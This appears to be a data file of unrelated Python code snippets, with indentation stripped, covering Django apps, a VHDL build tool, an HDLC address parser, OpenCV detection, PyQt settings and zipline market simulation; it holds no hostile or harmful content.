self._startAt = datetime.now()
self._endAt = None
self._lastEvent = self._startAt
self._prepareTime = None
# class properties
# ============================================================================
@property
def Host(self): return self._host
@property
def DryRun(self): return self._dryRun
@property
def VHDLVersion(self): return self._vhdlVersion
@property
def PoCProject(self): return self._pocProject
@property
def Directories(self): return self._directories
def _GetTimeDeltaSinceLastEvent(self):
now = datetime.now()
result = now - self._lastEvent
self._lastEvent = now
return result
def _PrepareEnvironment(self):
# create fresh temporary directory
self.LogVerbose("Creating fresh temporary directory.")
if (self.Directories.Working.exists()):
self._PrepareEnvironment_PurgeDirectory()
# self.LogDebug("Purging temporary directory: {0!s}".format(self.Directories.Working))
# for item in self.Directories.Working.iterdir():
# try:
# if item.is_dir():
# shutil.rmtree(str(item))
# elif item.is_file():
# item.unlink()
# except OSError as ex:
# raise CommonException("Error while deleting '{0!s}'.".format(item)) from ex
else:
self._PrepareEnvironment_CreatingDirectory()
# self.LogDebug("Creating temporary directory: {0!s}".format(self.Directories.Working))
# try:
# self.Directories.Working.mkdir(parents=True)
# except OSError as ex:
# raise CommonException("Error while creating '{0!s}'.".format(self.Directories.Working)) from ex
self._PrepareEnvironment_ChangeDirectory()
# change working directory to temporary path
# self.LogVerbose("Changing working directory to temporary directory.")
# self.LogDebug("cd \"{0!s}\"".format(self.Directories.Working))
# try:
# chdir(str(self.Directories.Working))
# except OSError as ex:
# raise CommonException("Error while changing to '{0!s}'.".format(self.Directories.Working)) from ex
def _PrepareEnvironment_PurgeDirectory(self):
self.LogDebug("Purging temporary directory: {0!s}".format(self.Directories.Working))
for item in self.Directories.Working.iterdir():
try:
if item.is_dir():
shutil.rmtree(str(item))
elif item.is_file():
item.unlink()
except OSError as ex:
raise CommonException("Error while deleting '{0!s}'.".format(item)) from ex
def _PrepareEnvironment_CreatingDirectory(self):
self.LogDebug("Creating temporary directory: {0!s}".format(self.Directories.Working))
try:
self.Directories.Working.mkdir(parents=True)
except OSError as ex:
raise CommonException("Error while creating '{0!s}'.".format(self.Directories.Working)) from ex
def _PrepareEnvironment_ChangeDirectory(self):
"""Change working directory to temporary path 'temp/<tool>'."""
self.LogVerbose("Changing working directory to temporary directory.")
self.LogDebug("cd \"{0!s}\"".format(self.Directories.Working))
try:
chdir(str(self.Directories.Working))
except OSError as ex:
raise CommonException("Error while changing to '{0!s}'.".format(self.Directories.Working)) from ex
def _Prepare(self):
self.LogNormal("Preparing {0}.".format(self.TOOL.LongName))
def _CreatePoCProject(self, projectName, board):
# create a PoCProject and read all needed files
self.LogVerbose("Creating PoC project '{0}'".format(projectName))
pocProject = VirtualProject(projectName)
# configure the project
pocProject.RootDirectory = self.Host.Directories.Root
pocProject.Environment = self.ENVIRONMENT
pocProject.ToolChain = self.TOOL_CHAIN
pocProject.Tool = self.TOOL
pocProject.VHDLVersion = self._vhdlVersion
pocProject.Board = board
self._pocProject = pocProject
def _AddFileListFile(self, fileListFilePath):
self.LogVerbose("Reading filelist '{0!s}'".format(fileListFilePath))
# add the *.files file, parse and evaluate it
# if (not fileListFilePath.exists()): raise SimulatorException("Files file '{0!s}' not found.".format(fileListFilePath)) from FileNotFoundError(str(fileListFilePath))
try:
fileListFile = self._pocProject.AddFile(FileListFile(fileListFilePath))
fileListFile.Parse(self._host)
fileListFile.CopyFilesToFileSet()
fileListFile.CopyExternalLibraries()
self._pocProject.ExtractVHDLLibrariesFromVHDLSourceFiles()
except (ParserException, CommonException) as ex:
raise SkipableCommonException("Error while parsing '{0!s}'.".format(fileListFilePath)) from ex
self.LogDebug("=" * 78)
self.LogDebug("Pretty printing the PoCProject...")
self.LogDebug("{DARK_RED}Disabled{NOCOLOR}".format(**Init.Foreground))
# self.LogDebug(self._pocProject.pprint(2))
self.LogDebug("=" * 78)
if (len(fileListFile.Warnings) > 0):
for warn in fileListFile.Warnings:
self.LogWarning(warn)
raise SkipableCommonException("Found critical warnings while parsing '{0!s}'".format(fileListFilePath))
def _GetHDLParameters(self, configSectionName):
"""Parse option 'HDLParameters' for Verilog Parameters / VHDL Generics."""
result = {}
hdlParameters = self.Host.PoCConfig[configSectionName]["HDLParameters"]
if (len(hdlParameters) > 0):
for keyValuePair in hdlParameters.split(";"):
try:
key,value = keyValuePair.split("=")
except ValueError:
raise CommonException("Syntax error in option 'HDLParameters' within section {section}.".format(section=configSectionName))
result[key.strip()] = value.strip()
return result
| StarcoderdataPython |
125312 | <reponame>dynamicguy/photomatic
__author__ = 'ferdous'
import celery
from celery.task import PeriodicTask
from datetime import timedelta, datetime
from celery.utils.log import get_task_logger
logger = get_task_logger(__name__)
@celery.task
class AlbumTask(PeriodicTask):
"""
A periodic task that import photos from facebook
"""
run_every = timedelta(minutes=100)
TODAY = datetime.now()
name = "photomatic.tasks.AlbumTask"
def run(self, **kwargs):
logger.info("Running fb album periodic task.")
return True
| StarcoderdataPython |
1731031 | from jchart import Chart
from .models import Customer
class TaxSubPieChart(Chart):
chart_type = 'pie'
responsive = False
def get_datasets(self, **kwargs):
print(f'{kwargs}')
tax_pay = Customer.objects.filter(vat__in=['ctvrtletne', 'mesicne'])
submitted = tax_pay.filter(submitted_tax=True)
return [{
'label': 'Podaná přiznání',
'data': [len(submitted), len(tax_pay) - len(submitted)],
'backgroundColor': ["#FF6384", "#36A2EB"],
'hoverBackgroundColor': ["#FF6384", "#36A2EB"],
}]
def get_labels(self, **kwargs):
return ['Podaná přiznání', 'Nepodaná přiznání']
class PapersPieChart(Chart):
chart_type = 'pie'
responsive = False
def get_datasets(self, **kwargs):
all_customers_cnt = len(Customer.objects.filter(papers__isnull=False))
papers_cnt = len(Customer.objects.filter(papers=True))
return [{
'label': 'Donesené doklady',
'data': [papers_cnt, all_customers_cnt - papers_cnt],
'backgroundColor': ["#FF6384", "#36A2EB"],
'hoverBackgroundColor': ["#FF6384", "#36A2EB"],
}]
def get_labels(self, **kwargs):
return ['Donesené doklady', 'Nedonesené doklady']
| StarcoderdataPython |
1748406 | import sys
import os
currentdir = os.path.dirname(__file__)
homedir = os.path.join(currentdir,"..")
sys.path.append(homedir)
| StarcoderdataPython |
3249948 | <gh_stars>1-10
# coding=utf-8
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^login/$', 'oecloud_dashboard.views.login'),
]
| StarcoderdataPython |
132700 | <reponame>adrianboratyn/TripRecommendations
import pandas as pd
import os.path
from django.core.management.base import BaseCommand, CommandError
import logging
from travels.models import Trip, TripDates
import datetime
import random
class Command(BaseCommand):
"""
Klasa do tworzenia typów wycieczek
"""
help = "Creating fields in Trips"
trips = Trip.objects.all().filter(country="Wyspy Zielonego Przylądka")
def handle(self, *args, **options):
"""
Metoda do tworzenia typów wycieczek
Args:
*args ():
**options ():
"""
for trip in self.trips:
trip.countryEN = "United Arab Emirates"
trip.currency = "CVE"
trip.climate = "Morski"
trip.rating = random.uniform(1, 6)
trip.save()
| StarcoderdataPython |
103541 | import os
import cv2 as cv
import numpy as np
import tensorflow as tf
CWD_PATH = os.getcwd()
MODEL_NAME = "scribbler_graph_board_v3/"
# PATH_TO_CKPT = '{}frozen_inference_graph.pb'.format(MODEL_NAME)
PATH_TO_CKPT = "{}opt_graph.pb".format(MODEL_NAME)
PATH_TO_LABELS = "object-detection.pbtxt"
cvNet = cv.dnn.readNetFromTensorflow(PATH_TO_CKPT, "graph.pbtxt")
img = cv.imread("example.jpg")
rows = img.shape[0]
cols = img.shape[1]
cvNet.setInput(cv.dnn.blobFromImage(img, size=(300, 300), swapRB=True, crop=False))
cvOut = cvNet.forward()
for detection in cvOut[0, 0, :, :]:
score = float(detection[2])
if score > 0.3:
left = detection[3] * cols
top = detection[4] * rows
right = detection[5] * cols
bottom = detection[6] * rows
cv.rectangle(
img,
(int(left), int(top)),
(int(right), int(bottom)),
(23, 230, 210),
thickness=2,
)
cv.imshow("img", img)
cv.waitKey()
| StarcoderdataPython |
3337350 | import abc
from zipline import protocol
from zipline.finance import asset_restrictions
from pluto.coms.utils import conversions
from pluto.control.controllable import synchronization_states as ss
from protos import clock_pb2
class Market(abc.ABC):
@abc.abstractmethod
def add_blotter(self, session_id):
raise NotImplementedError
@abc.abstractmethod
def get_transactions(self, dt, evt, signals):
raise NotImplementedError
@abc.abstractmethod
def get_blotter(self, session_id):
'''
Parameters
----------
session_id
Returns
-------
'''
raise NotImplementedError
class NoopMarket(Market):
def add_blotter(self, session_id):
pass
def get_transactions(self, dt, evt, signals):
return
def get_blotter(self, session_id):
return
class LiveSimulationMarket(Market):
def __init__(self, data_portal, data_frequency, universe, calendar, blotter_factory):
'''
Parameters
----------
data_portal
calendars
universe
blotter_factory: pluto.control.modes.market.blotter_factory.SimulationBlotterFactory
'''
self._dp = dtp = data_portal
self._sst = sst = ss.Tracker(universe.calendars)
sst.state = sst.out_session
self._blotter_factory = blotter_factory
self._current_dt = None
self._universe = universe
self._current_data = protocol.BarData(
data_portal=dtp,
simulation_dt_func=self.current_dt,
data_frequency=data_frequency,
trading_calendar=calendar,
# restrictions are assumed to be included in the universe
restrictions=asset_restrictions.NoRestrictions()
)
self._data_frequency = data_frequency
super(LiveSimulationMarket, self).__init__()
def current_dt(self):
return self._current_dt
def get_transactions(self, dt, evt, signals):
s = self._sst.aggregate(dt, evt, signals)
if s:
dt, e, exchanges = s
self._current_dt = t = conversions.to_datetime(dt)
if e == clock_pb2.TRADE_END:
for blotter in self._blotter_factory.blotters:
new_transactions, new_commissions, closed_orders = \
blotter.get_transactions(self._current_data)
blotter.prune_orders(closed_orders)
yield new_transactions, new_commissions
elif e == clock_pb2.BAR and self._data_frequency == 'minute':
for blotter in self._blotter_factory.blotters:
new_transactions, new_commissions, closed_orders = \
blotter.get_transactions(self._current_data)
blotter.prune_orders(closed_orders)
yield new_transactions, new_commissions
elif e == clock_pb2.SESSION_START:
assets = []
blotters = self._blotter_factory.blotters
for blotter in self._blotter_factory.blotters:
assets.extend(blotter.open_orders.keys())
if assets:
splits = self._dp.get_splits(assets, t)
if splits:
for blotter in blotters:
blotter.process_splits(splits)
def add_blotter(self, session_id):
self._blotter_factory.add_blotter(
session_id,
self._universe)
def get_blotter(self, session_id):
return self._blotter_factory.get_blotter(session_id)
# whats this?
class MarketAggregate(Market):
def __init__(self):
self._markets = []
def add_market(self, market):
self._markets.append(market)
def get_transactions(self, dt, evt, signals):
for market in self._markets:
yield market.get_transactions(dt, evt, signals)
def add_blotter(self, session_id):
for market in self._markets:
market.add_blotter(session_id)
| StarcoderdataPython |
3261956 | from django.contrib import admin
from .models import Post,reviewsData,reportPost,Comments
# Register your models here.
admin.site.register(Post)
admin.site.register(reviewsData)
admin.site.register(reportPost)
admin.site.register(Comments) | StarcoderdataPython |
3366989 | # Define the application directory
import os
# Statement for enabling the development environment
DEBUG = True
BASE_DIR = os.path.abspath(os.path.dirname(__file__))
# Define the database - we are working with
DATABASE = {
"engine": "mysql",
"database": "app",
"host": "localhost",
"port": "3306",
"username": "root",
"password": "",
}
# Application threads. A common general assumption is
# using 2 per available processor cores - to handle
# incoming requests using one and performing background
# operations using the other.
THREADS_PER_PAGE = 2
# Enable protection agains *Cross-site Request Forgery (CSRF)*
CSRF_ENABLED = True
# Use a secure, unique and absolutely secret key for
# signing the data.
CSRF_SESSION_KEY = "secret"
# Secret key for signing cookies
SECRET_KEY = "secret"
| StarcoderdataPython |
112281 | <reponame>telefonicaid/fiware-cloto<gh_stars>1-10
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# Copyright 2014 Telefónica Investigación y Desarrollo, S.A.U
#
# This file is part of FI-WARE project.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
#
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#
# For those usages not covered by the Apache version 2.0 License please
# contact with <EMAIL>
#
__author__ = 'arobres'
REST_PATH = '../../../../manage.py'
POLICY_MANAGER_IP = 'fiwarecloto'
POLICY_MANAGER_PORT = 8000
FACTS_IP = 'fiwarecloto'
FACTS_PORT = 5000
RABBIT_IP = 'rabbitmq'
AUTH_TOKEN_OLD = ''
KEYSTONE_URL = ''
TENANT_ID = ''
TENANT_NAME = ''
USER = ''
PASSWORD = ''
CONTENT_TYPE = 'application/json'
HEADERS = {'content-type': CONTENT_TYPE, 'X-Auth-Token': ''}
DB_PATH = '../../../../cloto.db'
MOCK_IP = u'127.0.0.1'
MOCK_PORT = 8080
MOCK_PATH = u'commons/server_mock.py'
| StarcoderdataPython |
3273 | from typing import *
import attr
from dlms_cosem.hdlc import validators
@attr.s(auto_attribs=True)
class HdlcAddress:
"""
A client address shall always be expressed on one byte.
To enable addressing more than one logical device within a single physical device
and to support the multi-drop configuration the server address may be divided in
two parts– may be divided into two parts:
The logical address to address a logical device (separate addressable entity
within a physical device) makes up the upper HDLC address
The logical address must always be present.
The physical address is used to address a physical device ( a physical device on
a multi-drop)
The physical address can be omitted it not used.
"""
logical_address: int = attr.ib(validator=[validators.validate_hdlc_address])
physical_address: Optional[int] = attr.ib(
default=None, validator=[validators.validate_hdlc_address]
)
address_type: str = attr.ib(
default="client", validator=[validators.validate_hdlc_address_type]
)
@property
def length(self):
"""
The number of bytes the address makes up.
:return:
"""
return len(self.to_bytes())
def to_bytes(self):
out: List[Optional[int]] = list()
if self.address_type == "client":
# shift left 1 bit and set the lsb to mark end of address.
out.append(((self.logical_address << 1) | 0b00000001))
else:
# server address type
logical_higher, logical_lower = self._split_address(self.logical_address)
if self.physical_address:
physical_higher, physical_lower = self._split_address(
self.physical_address
)
# mark physical lower as end
physical_lower = physical_lower | 0b00000001
out.extend(
[logical_higher, logical_lower, physical_higher, physical_lower]
)
else:
# no physical address so mark the logial as end.
logical_lower = logical_lower | 0b00000001
out.extend([logical_higher, logical_lower])
out_bytes = list()
for address in out:
if address:
out_bytes.append(address.to_bytes(1, "big"))
return b"".join(out_bytes)
@staticmethod
def _split_address(address: int) -> Tuple[Optional[int], int]:
higher: Optional[int]
lower: int
if address > 0b01111111:
lower = (address & 0b0000000001111111) << 1
higher = (address & 0b0011111110000000) >> 6
else:
lower = address << 1
higher = None
return higher, lower
@staticmethod
def _address_to_byte(address: int) -> bytes:
return address.to_bytes(1, "big")
@classmethod
def destination_from_bytes(cls, frame_bytes: bytes, address_type: str):
destination_address_data, _ = HdlcAddress.find_address_in_frame_bytes(
frame_bytes
)
(
destination_logical,
destination_physical,
destination_length,
) = destination_address_data
return cls(destination_logical, destination_physical, address_type)
@classmethod
def source_from_bytes(cls, frame_bytes: bytes, address_type: str):
_, source_address_data = HdlcAddress.find_address_in_frame_bytes(frame_bytes)
source_logical, source_physical, source_length = source_address_data
return cls(source_logical, source_physical, address_type)
@staticmethod
def find_address_in_frame_bytes(
hdlc_frame_bytes: bytes,
) -> Tuple[Tuple[int, Optional[int], int], Tuple[int, Optional[int], int]]:
"""
address can be 1, 2 or 4 bytes long. the end byte is indicated by the of
the last byte LSB being 1
The first address is the destination address and the seconds is the
source address.
:param frame_bytes:
:return:
"""
# Find destination address.
destination_length: int = 1
destination_logical: int = 0
destination_physical: Optional[int] = 0
destination_positions_list: List[Tuple[int, int]] = [(3, 1), (4, 2), (6, 4)]
address_bytes: bytes
for pos, _length in destination_positions_list:
end_byte = hdlc_frame_bytes[pos]
if bool(end_byte & 0b00000001):
# Found end byte:
destination_length = _length
break
continue
if destination_length == 1:
address_bytes = hdlc_frame_bytes[3].to_bytes(1, "big")
destination_logical = address_bytes[0] >> 1
destination_physical = None
elif destination_length == 2:
address_bytes = hdlc_frame_bytes[3:5]
destination_logical = address_bytes[0] >> 1
destination_physical = address_bytes[1] >> 1
elif destination_length == 4:
address_bytes = hdlc_frame_bytes[3:7]
destination_logical = HdlcAddress.parse_two_byte_address(address_bytes[:2])
destination_physical = HdlcAddress.parse_two_byte_address(address_bytes[3:])
# Find source address
source_length: int = 1
source_logical: int = 0
source_physical: Optional[int] = 0
source_position_list: List[Tuple[int, int]] = [
(item[0] + destination_length, item[1])
for item in destination_positions_list
]
for pos, _length in source_position_list:
end_byte = hdlc_frame_bytes[pos]
if bool(end_byte & 0b00000001):
# Found end byte:
source_length = _length
break
continue
if source_length == 1:
address_bytes = hdlc_frame_bytes[3 + destination_length].to_bytes(1, "big")
source_logical = address_bytes[0] >> 1
source_physical = None
elif source_length == 2:
address_bytes = hdlc_frame_bytes[3 + destination_length : 5 + source_length]
source_logical = address_bytes[0] >> 1
source_physical = address_bytes[1] >> 1
elif destination_length == 4:
address_bytes = hdlc_frame_bytes[3 + destination_length : 7 + source_length]
source_logical = HdlcAddress.parse_two_byte_address(address_bytes[:2])
source_physical = HdlcAddress.parse_two_byte_address(address_bytes[3:])
return (
(destination_logical, destination_physical, destination_length),
(source_logical, source_physical, source_length),
)
@staticmethod
def parse_two_byte_address(address_bytes: bytes):
if address_bytes != 2:
raise ValueError(f"Can only parse 2 bytes for address")
upper = address_bytes[0] >> 1
lower = address_bytes[1] >> 1
return lower + (upper << 7)
| StarcoderdataPython |
48916 | from typing import Callable, Awaitable
CoroutineFunction = Callable[..., Awaitable]
| StarcoderdataPython |
198197 | <gh_stars>0
"""
settings.py
-----------
Implements functions for reading and writing UI configuration using a QSettings object.
"""
from PyQt5 import QtWidgets
from instruments import triggering
import re
MPTS_trigger_file = ".config/MPTS_config.txt"
regex = re.compile('(\S+)[\s*]=[\s*]"(\S+)"')
def read_settings(config, ui):
"""Reads configuration from the ini-file.
Uses default values if no settings are found.
"""
# General
ui.comboBoxOperationMode.setCurrentIndex(config.value("OperationMode", 3, type=int))
ui.checkBoxContinuouslyUpdate.setChecked(config.value("ContinuouslyUpdate", True, type=bool))
ui.CamerasFrameRate.setValue(config.value("CamerasFrameRate", 10900, type=int))
ui.CamerasExposureTime.setValue(config.value("CamerasExposureTime", 100, type=int))
ui.Operator.setText(config.value("Operator", "", type=str))
ui.Email.setText(config.value("Email", "", type=str))
ui.Aim.setText(config.value("Aim", "", type=str))
ui.Comments.setPlainText(config.value("Comments", "", type=str))
# Laser PS
ui.LaserPSSerialPort.setText(config.value("LaserPS/SerialPort", "COM1", type=str))
ui.LaserPSMainVoltage.setValue(config.value("LaserPS/MainVoltage", None, type=int))
ui.LaserPSAux1Voltage.setValue(config.value("LaserPS/Aux1Voltage", None, type=int))
ui.LaserPSAux2Voltage.setValue(config.value("LaserPS/Aux2Voltage", None, type=int))
ui.LaserPSAux3Voltage.setValue(config.value("LaserPS/Aux3Voltage", None, type=int))
ui.LaserPSAuxDelay.setValue(config.value("LaserPS/AuxDelay", None, type=float))
ui.LaserPSSimmerDelay.setValue(config.value("LaserPS/SimmerDelay", None, type=int))
ui.LaserPSBurstNumber.setValue(config.value("LaserPS/BurstNumber", None, type=int))
ui.LaserPSBurstSeperation.setValue(config.value("LaserPS/BurstSeparation", None, type=float))
ui.LaserPSResMainVoltage.setValue(config.value("LaserPS/ResMainVoltage", None, type=int))
ui.LaserPSResAuxVoltage.setValue(config.value("LaserPS/ResAuxVoltage", None, type=int))
ui.LaserPSMaxBurstNumber.setValue(config.value("LaserPS/MaxBurstNumber", None, type=int))
ui.LaserPSMaxBurstDuration.setValue(config.value("LaserPS/MaxBurstDuration", None, type=int))
ui.LaserPSMaxExplosionEnergy.setCurrentIndex(config.value("LaserPS/MaxExplosionEnergy", 0, type=int))
ui.LaserPSAccurChargeV.setValue(config.value("LaserPS/AccurChargeV", None, type=float))
ui.LaserPSMaxDelayFlash.setValue(config.value("LaserPS/MaxDelayFlash", None, type=int))
ui.LaserPSTriggerSimmer.setValue(config.value("LaserPS/TriggerSimmer", None, type=int))
ui.LaserPSSignalReady.setValue(config.value("LaserPS/SignalReady", None, type=int))
ui.LaserPSModeBanks.setValue(config.value("LaserPS/BankMode", None, type=int))
# Phantom1
ui.Phantom1IP.setText(config.value("Phantom1/IP", "192.168.127.12", type=str))
index = ui.Phantom1FrameSync.findText(config.value("Phantom1/FrameSync", "", type=str))
ui.Phantom1FrameSync.setCurrentIndex(index if index > 0 else 0)
index = ui.Phantom1ImageFormat.findText(config.value("Phantom1/ImageFormat", "", type=str))
ui.Phantom1ImageFormat.setCurrentIndex(index if index > 0 else 0)
# Phantom2
ui.Phantom2IP.setText(config.value("Phantom2/IP", "172.16.58.3", type=str))
index = ui.Phantom1FrameSync.findText(config.value("Phantom2/FrameSync", "", type=str))
ui.Phantom2FrameSync.setCurrentIndex(index if index > 0 else 0)
index = ui.Phantom1ImageFormat.findText(config.value("Phantom2/ImageFormat", "", type=str))
ui.Phantom2ImageFormat.setCurrentIndex(index if index > 0 else 0)
# I2PS
ui.comboBoxI2PSSelectPS.setCurrentIndex(config.value("I2PS/SelectPS", 0, type=int))
ui.I2PSIP.setText(config.value("I2PS/IP", "127.0.0.1", type=str))
ui.I2PSVoltagePPMCP.setValue(config.value("I2PS/VoltagePPMCP", 0, type=int))
ui.I2PSVoltageMCP.setValue(config.value("I2PS/VoltageMCP", 0, type=int))
ui.I2PSVoltagePCHighSide.setValue(config.value("I2PS/VoltagePCHighSide", 0, type=int))
ui.I2PSVoltagePCLowSide.setValue(config.value("I2PS/VoltagePCLowSide", 0, type=int))
ui.I2PSPulseDuration.setValue(config.value("I2PS/PulseDuration", 0, type=int))
ui.I2PSTriggerDelay.setValue(config.value("I2PS/TriggerDelay", 0, type=int))
ui.II_Coarse.setCurrentIndex(config.value("I2PS/Coarse", 0, type=int))
ui.II_Fine.setValue(config.value("I2PS/Fine", 0, type=float))
ui.II_Gain.setValue(config.value("I2PS/Gain", 0, type=float))
# Ophir
ui.OphirSerialPort.setText(config.value("Ophir/SerialPort", "COM2", type=str))
# ADC
ui.ADCRecordLength.setValue(config.value("ADC/RecordLength", 131072, type=int))
index = ui.ADCSampleRate.findText(config.value("ADC/SampleRate", "", type=str))
ui.ADCSampleRate.setCurrentIndex(index if index > 0 else 11)
index = ui.ADCInputRange.findText(config.value("ADC/InputRange", "", type=str))
ui.ADCInputRange.setCurrentIndex(index if index > 0 else 11)
ui.ADCCH1Name.setText(config.value("ADC/CH1Name", "", type=str))
ui.ADCCH2Name.setText(config.value("ADC/CH2Name", "", type=str))
ui.ADCCH1Enable.setChecked(config.value("ADC/CH1Enable", True, type=bool))
ui.ADCCH2Enable.setChecked(config.value("ADC/CH2Enable", True, type=bool))
# Scope
ui.ScopeSerialPort.setText(config.value("Scope/SerialPort", "COM3", type=str))
ui.ScopeIP.setText(config.value("Scope/IP", "10.182.5.8", type=str))
ui.ScopeCH1Name.setText(config.value("Scope/CH1Name", "", type=str))
ui.ScopeCH2Name.setText(config.value("Scope/CH2Name", "", type=str))
ui.ScopeCH3Name.setText(config.value("Scope/CH3Name", "", type=str))
ui.ScopeCH4Name.setText(config.value("Scope/CH4Name", "", type=str))
ui.ScopeCH1Enable.setChecked(config.value("Scope/CH1Enable", True, type=bool))
ui.ScopeCH2Enable.setChecked(config.value("Scope/CH2Enable", True, type=bool))
ui.ScopeCH3Enable.setChecked(config.value("Scope/CH3Enable", True, type=bool))
ui.ScopeCH4Enable.setChecked(config.value("Scope/CH4Enable", True, type=bool))
# Triggering
ui.TriggerIP.setText(config.value("Triggering/IP", "127.0.0.1", type=str))
ui.TriggerPort.setValue(config.value("Triggering/Port", "15000", type=int))
# Triggering/times
f = open(MPTS_trigger_file, 'r')
data = f.readlines()
f.close()
read_trigger_settings(data, ui)
def save_settings(config, ui):
"""Saves current UI configuration to ini file, called when exiting the main application"""
config.setValue("OperationMode", ui.comboBoxOperationMode.currentIndex())
config.setValue("CamerasFrameRate", ui.CamerasFrameRate.value())
config.setValue("CamerasExposureTime", ui.CamerasExposureTime.value())
config.setValue("ContinuouslyUpdate", ui.checkBoxContinuouslyUpdate.isChecked())
config.setValue("Operator", ui.Operator.text())
config.setValue("Email", ui.Email.text())
config.setValue("Aim", ui.Aim.text())
config.setValue("Comments", ui.Comments.toPlainText())
config.beginGroup("LaserPS")
config.setValue("SerialPort", ui.LaserPSSerialPort.text())
config.setValue("MainVoltage", ui.LaserPSMainVoltage.value())
config.setValue("Aux1Voltage", ui.LaserPSAux1Voltage.value())
config.setValue("Aux2Voltage", ui.LaserPSAux2Voltage.value())
config.setValue("Aux3Voltage", ui.LaserPSAux3Voltage.value())
config.setValue("AuxDelay", ui.LaserPSAuxDelay.value())
config.setValue("SimmerDelay", ui.LaserPSSimmerDelay.value())
config.setValue("BurstNumber", ui.LaserPSBurstNumber.value())
config.setValue("BurstSeparation", round(ui.LaserPSBurstSeperation.value(), 1))
config.setValue("ResMainVoltage", ui.LaserPSResMainVoltage.value())
config.setValue("ResAuxVoltage", ui.LaserPSResAuxVoltage.value())
config.setValue("MaxBurstNumber", ui.LaserPSMaxBurstNumber.value())
config.setValue("MaxBurstDuration", ui.LaserPSMaxBurstDuration.value())
config.setValue("MaxExplosionEnergy", ui.LaserPSMaxExplosionEnergy.currentIndex())
config.setValue("PSAccurChargeV", ui.LaserPSAccurChargeV.value())
config.setValue("MaxDelayFlash", ui.LaserPSMaxDelayFlash.value())
config.setValue("TriggerSimmer", ui.LaserPSTriggerSimmer.value())
config.setValue("SignalReady", ui.LaserPSSignalReady.value())
config.setValue("BankMode", ui.LaserPSModeBanks.value())
config.endGroup()
config.beginGroup("Phantom1")
config.setValue("IP", ui.Phantom1IP.text())
config.setValue("FrameSync", ui.Phantom1FrameSync.currentText())
config.setValue("ImageFormat", ui.Phantom1ImageFormat.currentText())
config.endGroup()
config.beginGroup("Phantom2")
config.setValue("IP", ui.Phantom2IP.text())
config.setValue("FrameSync", ui.Phantom2FrameSync.currentText())
config.setValue("ImageFormat", ui.Phantom2ImageFormat.currentText())
config.endGroup()
config.beginGroup("I2PS")
config.setValue("SelectPS", ui.comboBoxI2PSSelectPS.currentIndex())
config.setValue("IP", ui.I2PSIP.text())
config.setValue("VoltagePPMCP", ui.I2PSVoltagePPMCP.value())
config.setValue("VoltageMCP", ui.I2PSVoltageMCP.value())
config.setValue("VoltagePCHighSide", ui.I2PSVoltagePCHighSide.value())
config.setValue("VoltagePCLowSide", ui.I2PSVoltagePCLowSide.value())
config.setValue("PulseDuration", ui.I2PSPulseDuration.value())
config.setValue("TriggerDelay", ui.I2PSTriggerDelay.value())
config.setValue("Coarse", ui.II_Coarse.currentIndex())
config.setValue("Fine", ui.II_Fine.value())
config.setValue("Gain", ui.II_Gain.value())
config.endGroup()
config.beginGroup("Ophir")
config.setValue("SerialPort", ui.OphirSerialPort.text())
config.endGroup()
config.beginGroup("ADC")
config.setValue("RecordLength", ui.ADCRecordLength.value())
config.setValue("SampleRate", ui.ADCSampleRate.currentText())
config.setValue("InputRange", ui.ADCInputRange.currentText())
config.setValue("CH1Name", ui.ADCCH1Name.text())
config.setValue("CH2Name", ui.ADCCH2Name.text())
config.setValue("CH1Enable", ui.ADCCH1Enable.isChecked())
config.setValue("CH2Enable", ui.ADCCH2Enable.isChecked())
config.endGroup()
config.beginGroup("Scope")
config.setValue("SerialPort", ui.ScopeSerialPort.text())
config.setValue("IP", ui.ScopeIP.text())
config.setValue("CH1Name", ui.ScopeCH1Name.text())
config.setValue("CH2Name", ui.ScopeCH2Name.text())
config.setValue("CH3Name", ui.ScopeCH3Name.text())
config.setValue("CH4Name", ui.ScopeCH4Name.text())
config.setValue("CH1Enable", ui.ScopeCH1Enable.isChecked())
config.setValue("CH2Enable", ui.ScopeCH2Enable.isChecked())
config.setValue("CH3Enable", ui.ScopeCH3Enable.isChecked())
config.setValue("CH4Enable", ui.ScopeCH4Enable.isChecked())
config.endGroup()
config.beginGroup("Triggering")
config.setValue("IP", ui.TriggerIP.text())
config.setValue("Port", ui.TriggerPort.value())
config.endGroup()
# Triggering/times
write_trigger_settings(MPTS_trigger_file, ui)
def read_trigger_settings(data, ui):
for command in data:
match = regex.search(command)
if match.group(1) == "End_of_file":
break
widget = ui.centralwidget.findChild(QtWidgets.QSpinBox, triggering.logical_names[match.group(1)])
if widget:
widget.setValue(int(match.group(2)))
else:
widget = ui.centralwidget.findChild(QtWidgets.QCheckBox, triggering.logical_names[match.group(1)])
widget.setChecked(int(match.group(2)))
def write_trigger_settings(filename, ui):
f = open(filename, 'w')
for logical_name in triggering.physical_names:
widget = ui.centralwidget.findChild(QtWidgets.QSpinBox, logical_name)
if widget:
f.write('%s = "%s"\n' % (triggering.physical_names[logical_name], widget.value()))
else:
widget = ui.centralwidget.findChild(QtWidgets.QCheckBox, logical_name)
f.write('%s = "%s"\n' % (logical_name, int(widget.isChecked())))
f.write('End_of_file = "empty"\n')
f.close()
| StarcoderdataPython |
184661 | <filename>AC-OhmsLaw/polar.py
# This is a partial program to run interactively from the command line, e.g.
# linux: python3 -i polar.py
# win: python -i polar.py
import numpy
# Euler's Formula for Polar (magnitude, degrees) to Rectangular (x, yj) on complex plane.
def Pd2R(A, deg):
return A*( numpy.cos(numpy.deg2rad(deg)) + 1.0j*numpy.sin(numpy.deg2rad(deg)) )
# Display Polar format
def R2Pd(x):
string2return = ('{:0.3g}'.format(numpy.abs(x)) + "<" + '{:0.3g}'.format(numpy.rad2deg(numpy.angle(x))) + "deg")
return string2return
# Display Polar format with unit
def R2PdU(x, unit):
string2return = ('{:0.3g}'.format(numpy.abs(x)) + unit + "<" + '{:0.3g}'.format(numpy.rad2deg(numpy.angle(x))) + "deg")
return string2return | StarcoderdataPython |
1768710 | <filename>Evernote_Django/evernote/forms.py
from django import forms
from django.contrib.auth.forms import UserCreationForm, AuthenticationForm
from django.core.files.uploadedfile import InMemoryUploadedFile
from .models import *
